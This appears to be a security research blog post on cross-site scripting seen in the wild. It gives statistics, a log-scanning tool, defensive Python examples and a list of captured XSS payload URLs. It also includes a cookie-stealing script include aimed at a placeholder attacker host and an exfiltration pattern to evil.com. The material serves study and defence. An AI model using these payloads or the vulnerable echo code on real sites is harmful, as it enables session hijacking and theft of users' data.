SpiderLabs Blog

The Web IS Vulnerable: XSS on the Battlefront (Part 1)


For those of you who were not able to make it to our talk at Blackhat USA, this blog post provides an overview of the information presented. This was a joint presentation by the Trustwave SpiderLabs Research Team and Microsoft's Security Research and Defense Team.


This is part 1 of a 2 part blog post. In this installment, we will discuss example XSS attacks captured in the wild and also some statistics. In part 2, we will discuss XSS Defense Techniques.

XSS: Vulnerability Prevalence

OWASP Top 10 2013

The latest OWASP Top 10 Web Applications Risk Project lists the following risk graphic for XSS:


As you can see from this graphic, the PREVALENCE of XSS across all applications tested is VERY WIDESPREAD.

Trustwave Global Security Report

In the latest Trustwave Global Security Report, the SpiderLabs App-Pentest Team generated the following list of top vulnerabilities identified in the last year during their engagements:

Again, XSS is listed as the top vulnerability identified.

XSS: Attack Likelihood

The previous section provided metrics to support the theory that we already know - XSS vulnerabilities are rampant. What we wanted to focus on for our research was this - HOW are XSS vulnerabilities being exploited in the wild?

XSS Attack Data Sources

In order to find real-world attack data, we analyzed a variety of resources:

  • Web server/proxy logs
  • Web application firewall logs
  • URL shortening services
  • Spam e-mails
  • Chat rooms, IRC traffic
  • Comments on pages
  • URL reputation services

All of this data together yielded approximately:

  • 100s TB of raw data
  • 10s TB of URLs

XSS Attack Data Analysis

So, how did we analyze this data for XSS attacks? Greg created a toolset called detectXSSlib:

  • General purpose library written in C
  • Based on a subset of OWASP CRS rules (IE XSS Filters)
  • Optimized for performance
  • Rules selected on the basis of empirical data
  • Command line tool provided (xssscan)
  • Easy to integrate with other components
  • nginx module PoC provided

The xssscan command line tool can be used like this:

    # ./xssscan
    xssscan ver 1.0 (c) 2013 Greg Wroblewski
    Command line tool for detection of XSS attacks in URLs. Based on ModSecurity rules from OWASP CRS.
    Optimized for performance and large scale data mining.

    Usage:
    xssscan [-t] [-r] [-x] <URL>
    xssscan [-a] [-d] [-r] [-x] -f <TEXT_FILE_WITH_URLS>

    Options:
    -a - in output replace host names with www.example.com
    -d - deduplicate URLs by same host name
    -r - show rule number for detected XSS (for statistics or debugging)
    -t - show tokens of parsed URL (useful for debugging only)
    -x - list only URLs where XSS was not detected (default: was detected)

    # ./xssscan -f /var/log/apache2/access.log
    172.16.209.1 - - [24/Jul/2013:10:40:40 -0400] "GET /wordpress/?s=%3Cscript%3Eprompt%28%22TEST%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 2155 "http://172.16.209.131/wordpress/?s=%3Cimg+src%3D1+onerror%3Dalert%28%27XSS%27%29%3E" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0"
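To make the scanning workflow concrete, here is a small added example in Python, written for this page and not the detectXSSlib/xssscan code the post describes. It pulls the request target and the Referer out of Apache combined-format log lines, percent-decodes them more than once so double-encoded payloads also surface, runs a handful of hand-written regexes in the spirit of the OWASP CRS XSS filters, and reproduces the tool's -a (replace host names with www.example.com), -d (one URL per host) and -x (list only clean URLs) switches. The rule ids and regexes, the sample log lines and the host names in them are all constructed for this example; the real tool uses the CRS rules and their ids.

```python
"""xssscan-style scanner over Apache access logs (added example, not detectXSSlib)."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed rule table in the spirit of the OWASP CRS XSS filters.
# The 9xxx ids are placeholders for this example, not CRS rule ids.
RULES = [
    (9001, "script tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    (9002, "inline event handler attribute", re.compile(r"\bon[a-z]+\s*=", re.I)),
    (9003, "javascript: URI", re.compile(r"javascript\s*:", re.I)),
    (9004, "iframe/object/embed injection", re.compile(r"<\s*(iframe|object|embed)\b", re.I)),
    (9005, "alert/prompt/confirm probe", re.compile(r"\b(alert|prompt|confirm)\s*\(", re.I)),
]

# Apache "combined" format: client ident user [time] "request" status bytes "referer" "user-agent"
APACHE_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+)(?: [^"]*)?" \d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

# Constructed log lines modelled on the tool's sample output; hosts and addresses are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jul/2013:10:40:40 -0400] "GET /wordpress/?s=%3Cscript%3Eprompt%28%22TEST%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 2155 "http://shop.example.test/?s=%3Cimg+src%3D1+onerror%3Dalert%28%27XSS%27%29%3E" "Mozilla/5.0"',
    '10.0.0.6 - - [24/Jul/2013:10:41:02 -0400] "GET /search.php?q=%2522%253E%253Cscript%253Ealert%25280%2529%253C%2Fscript%253E HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [24/Jul/2013:10:41:30 -0400] "GET /catalog/details.php?search=shoes HTTP/1.1" 200 5120 "http://shop.example.test/" "Mozilla/5.0"',
]


def urls_from_access_log(lines):
    """Collect the request target and (when present) the Referer of each log line."""
    urls = []
    for line in lines:
        m = APACHE_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        urls.append(m.group("path"))
        if m.group("referer") not in ("", "-"):
            urls.append(m.group("referer"))
    return urls


def decode_url(url, rounds=3):
    """Percent-decode up to `rounds` times so %253C (double-encoded '<') is seen as '<'."""
    for _ in range(rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url


def match_rules(url):
    """Return the ids of all rules that fire on the decoded URL (the -r output)."""
    decoded = decode_url(url)
    return [rid for rid, _desc, rx in RULES if rx.search(decoded)]


def anonymize(url):
    """The -a behaviour: keep path and query, replace the host with www.example.com."""
    parts = urlsplit(url)
    return parts._replace(netloc="www.example.com").geturl() if parts.netloc else url


def scan_urls(urls, anonymize_hosts=False, dedupe_by_host=False, show_clean=False):
    """Scan a URL list and return [(url, [rule_ids])].

    show_clean=False lists only URLs where some rule fired (the tool's default);
    show_clean=True lists only URLs where nothing fired (the tool's -x).
    """
    results, seen_hosts = [], set()
    for url in urls:
        host = urlsplit(url).netloc
        if dedupe_by_host and host:  # -d: first URL per host wins
            if host in seen_hosts:
                continue
            seen_hosts.add(host)
        rules = match_rules(url)
        if bool(rules) == show_clean:
            continue
        results.append((anonymize(url) if anonymize_hosts else url, rules))
    return results


if __name__ == "__main__":
    for url, rules in scan_urls(urls_from_access_log(SAMPLE_LOG), anonymize_hosts=True):
        print(rules, url)
```

The repeated decoding is the part most worth copying: a single unquote leaves `%253Cscript%253E` looking harmless, which is exactly the kind of probe the statistics in this post are built on.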

Sanitized Example Attack Data

Sanitized XSS attack data is found here in Greg's GitHub Repo. Here is a small snippet of real-world attack data:

http://www.example.com/SpecialPages/SearchResults.aspx?searchtext=%3Cscript%3Ealert%28%22NO%20I%20WONT%20%3C3%20%22%29%3C/script%3E%3Chtml%3E%3Cbody%3E%3CIMG%20SRC=%22http://images.wikia.com/adventuretimewithfinnandjake/images/3/3e/Troll_Face.png%22%3E%3C/body%3E%3C/html%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/watch?v=i6uK7VaREm0rel=0&amp;autoplay=1%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E%3Chtml%3E%3C%2fSCRIPT%3E&searchmode=anyword
http://www.example.com/cgi-bin/survey//%3Cvideo%3E%3Csource%20onerror=%22javascript:prompt%2869%29%22%3E
http://www.example.com/search/?q=%22%3E%3Cscript%3Ealert%28%27%D0%98+%D0%B2%D1%81%D1%91+%D1%82%D0%B0%D0%BA%D0%B8+%D1%80%D0%BE%D0%BC%D0%B0%D0%BD%D1%82%D0%B8%D0%BA%D0%B0+%D0%BF%D1%80%D0%B8%D1%81%D1%83%D1%82%D1%81%D0%B2%D1%83%D0%B5%D1%82%27%29%3C%2Fscript%3E&cx=011227069628851513317%3Aqmm3bt0nuum&cof=FORID%3A11&ie=UTF-8&siteurl=http%3A%2F%2Flaw.wfu.edu%2Fhousing%2F%3Fid%3D1090%2527
http://www.example.com/search.php?q=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
http://www.example.com/search?q=%3Cscript%3Ealert%28%2Fsanko%2F%29%3C%2Fscript%3E&btnG=Go&site=mit&client=mit&proxystylesheet=http%3A%2F%2Fweb.mit.edu%2Fcre%2Fc%2Fgoogle-crestyles-v4.xsl&output=xml_no_dtd&as_dt=i&as_sitesearch=http%3A%2F%2Fweb.mit.edu%2Fcre&proxyreload=1
http://www.example.com/classkey.php?keyword=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3Ch1%3EKhawaja+Samad%3C%2Fh1%3
http://www.example.com/search?q=%22%3E%3Cscript%3Ealert%28%22hacked%20by%20blackwood%22%29%3B%3C%2Fscript%3E+%3E&btnG=Search&site=NYUWeb_Main&client=NYUWeb_Main&output=xml_no_dtd&proxyreload=1&proxystylesheet=stern_frontend&sitesearch=www.stern.nyu.edu&ie=UTF-8&sort=date%3AD%3AL%3Ad1&entqr=0&entqrm=0&entsp=a__NYUWeb_Main_bias_policy&oe=UTF-8&ud=1
http://www.example.com/catalog/details.php?search=%3Cscript%3Ealert%28%22pawa+gysb%22%29%3C%2Fscript%3E&submit.x=0&submit.y=0
http://www.example.com/microsite/itop_resultat.php?g1=Treball%20social&logo1=pt&url1=http://www.peretarres.org/wps/wcm/connect/peretarres_ca/eutses/home/estudis/graus_diplomatures/treball_social/treballador_social/&video1=%3Cscript%3Ealert%280%29%3C/script%3E&g2=&logo2=&url2=&video2=&g3=&logo3=&url3=&video3=&g4=&logo4=&url4=&video4=&g5=&logo5=&url5=&video5=&g6=&logo6=&url6=&video6=
http://www.example.com/fdsys/search/searchresults.action?st=%22%3E%3Cimg%20src=%22http://hubbu-hotel.square7.ch/x48HP.jpg%22%20height=%22650%22%20width=%221000%22%3E%3CIFRAME%20SRC=%22javascript:alert%28%27XSSED%20BY%20ANONYMOUS%20SQUAD%20035%27%29;%22%3E%3C/IFRAME%3E%3Cfont+color%3D%22red%22+size%3D%225%22%3EXSSD+BY%3A%3C%2Ffont%3E%3Cbr%3E%3Cfont+color%3D%22green%22+size%3D%2210%22%3E%3Cblink%3E+Anonymous+Squad+No.+035+%3C%2Fblink%3E%3C%2Ffont%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cfont+color%3D%22red%22%3EWe+are+Anonymous+%3Cbr%3E%3Cbr%3EWe+are+Legion+%3Cbr%3E%3Cbr%3EWe+do+not+FORGIVE%3Cbr%3E%3Cbr%3EWe+do+not+FORGET%3Cbr%3E%3Cbr%3EEXPECT+US!!!+%3Cbr%3E%3Cbr%3E%3C%2Ffont%3E%3Cfont+color%3D%22green%22+size%3D%225%22%3EGREETINGS+TO+%3A%3C%2Ffont%3E%3Cbr%3E%3Cmarquee+behavior%3D%22scroll%22+direction%3D%22left%22+scrollamount%3D%222%22+scrolldelay%3D%2220%22%3E%3Ch2%3E%20Anonymous%20Squad%20No.035%20was%20Here%20%3C/h2%3E%20%3Ch2%3E%20Hacked%20by%20xR0CKTH4T%20%3C/h2%3E%20%3Ch2%3E%20We%20are%20Anonymous%20%3Cbr%3E%20We%20are%20Legion%20%3Cbr%3E%20We%20do%20not%20forgive%20%3Cbr%3E%20We%20do%20not%20forget%20%3Cbr%3E%20Expect%20us!%20%3C/h2%3E

XSS Attack Examples: Proof-of-Concept Testing

Many XSS attacks are simple probes that test for the existence of missing output encoding defenses, for example:

These tests fall into the following categories:

Malicious intent
  • Scanning tools
  • Proof-of-concept
  • Probing

Benign intent
  • Scanning tools
  • Going after bug bounty
  • Internal testing

XSS Attack Examples: Defacements

Website defacements were another popular outcome for using XSS attacks. Here is an example attack payload:

This attack resulted in a defacement similar to the following screenshot:


XSS Attack Examples: Cookie Stealing

This is the first XSS attack category that directly negatively impacts web application users. Here is an example attack payload:

In line #1 - the attacker sends the XSS payload in a parameter that overrides the Referer data echoed back in the response to execute JS code. This code would instruct the browser to download the wwgw8k5srago.js file. This file contains the data in line #2, which instructs the browser to make a request to the nwwgw8k5sra.gif URL and to pass the document.cookie DOM data as a parameter. If this attack is successful, the attacker can quickly use the application Session ID cookie value to log into the application as the victim user.
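Two points in the walkthrough above are the ones a defender controls: the response reflected the Referer without output encoding, and the session cookie was readable from document.cookie. The following added Python example (written for this page, not code from the post or from the attacked application) shows a banner that echoes the Referer in its vulnerable form next to an HTML-encoded form, and a Set-Cookie value that carries HttpOnly so script cannot read the session cookie even where reflection does slip through. The payload string, the attacker host name and the session id are constructed placeholders.

```python
"""Reflected Referer with and without output encoding, plus an HttpOnly session cookie.
Added example; the payload, host and session id are constructed placeholders."""
import html
from http.cookies import SimpleCookie

# Constructed stand-in for the captured payload: an external script include of the
# kind described in line #1 of the post's screenshot (attacker.invalid is a placeholder).
PAYLOAD = '"><script src="http://attacker.invalid/wwgw8k5srago.js"></script>'


def referer_banner_vulnerable(referer):
    """Reflects the Referer verbatim into HTML: a payload in it becomes live markup."""
    return '<p>You came from <a href="%s">%s</a></p>' % (referer, referer)


def referer_banner_safe(referer):
    """Same feature with HTML output encoding; < > " ' & are rendered as text, not markup."""
    encoded = html.escape(referer, quote=True)
    return '<p>You came from <a href="%s">%s</a></p>' % (encoded, encoded)


def session_cookie_header(session_id):
    """Set-Cookie value for the session: HttpOnly keeps it out of document.cookie,
    Secure restricts it to HTTPS, SameSite=Lax limits cross-site sending."""
    jar = SimpleCookie()
    jar["SESSIONID"] = session_id
    jar["SESSIONID"]["httponly"] = True
    jar["SESSIONID"]["secure"] = True
    jar["SESSIONID"]["samesite"] = "Lax"
    jar["SESSIONID"]["path"] = "/"
    return jar["SESSIONID"].OutputString()


if __name__ == "__main__":
    print("vulnerable:", referer_banner_vulnerable(PAYLOAD))
    print("encoded:   ", referer_banner_safe(PAYLOAD))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```

Output encoding in the template is the fix for the reflection itself; HttpOnly is the second layer that keeps a stolen-cookie login from working when some other reflection is missed.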

XSS Attack Examples: In-Session Phishing

***This example uses an XSS vulnerability in Hotmail that has since been fixed.***

If attackers can identify XSS vulnerabilities within web-based email providers, then they can send targeted Phishing emails to users. Take a look at the example exploit code:

In this instance, if I were logged into Hotmail and received the Phishing email, the JS code would trigger the onerror event handler and issue a jQuery call to the attacker's site, which would present me with the following fake login page:


If the victim falls for this attack, their credentials will be sent to the attacker's site. We have seen at least 10 different instances of this type of attack, usually launched against e-mail providers and financial institutions, very often carefully prepared with localized login screens, well-concealed password delivery servers, etc.

XSS Attack Examples: Data Exfiltration

With a successful attack, the script runs in the browser within the victim's current session. The script could hijack and upload to the attacker the entire on-line content accessible from that session. Examples: list of contacts, e-mails, attachments, calendar, files, etc. After a successful upload the script redirects to a phishing page to get the victim's credentials (the address bar does not change!).

In one case of the attack, the script we have seen had 10s of kB of code, and even included interesting left-over comments. How nice.


The script was able to enumerate through multiple pages of e-mail boxes, extract e-mail data, including attachments, and also steal the contact list. The script was able to:

  • Enumerate through last 60 pages worth of e-mail
  • Extract the From, Subject, and Body of the e-mail by using the same calls as would be triggered if user were to view the e-mails
  • Inject new script elements with source set to the URL containing the next chunk of the data read from the file.
  • Send data in chunks to http://evil.com/hotmail_xss.php?u=<email>&msg= <subject+from>^^<segmentindex>^^<next segment of message body>
  • Fetch content off of inbox/sent/drafts.
  • Clean up: mark messages that were not originally read as unread

The upload process was also not trivial, leveraging data chunking.

XSS Attack Statistics

# of Successful XSS Attacks per TLD


We have seen at least one sample of a working attack for almost every single TLD out there.

Successful XSS Attacks Over Time


The intensity of attacks remained at a constant level over the time we were able to monitor them consistently.

Prevalence of XSS Attacks (based on Alexa Top N list)


Well over 6% of top 1,000 websites had a successful XSS attack.

Part 1 Conclusion

As we have outlined in Part 1 of this blog post, XSS attacks are real. They range in severity and impact depending on what your business model is and who your customers are; however, outcomes such as account hijacking and data exfiltration are serious issues.

How do we protect against XSS attacks? Stay tuned for Part 2, where I will provide an overview of tactical XSS defenses which can be used in production to help mitigate exposures.
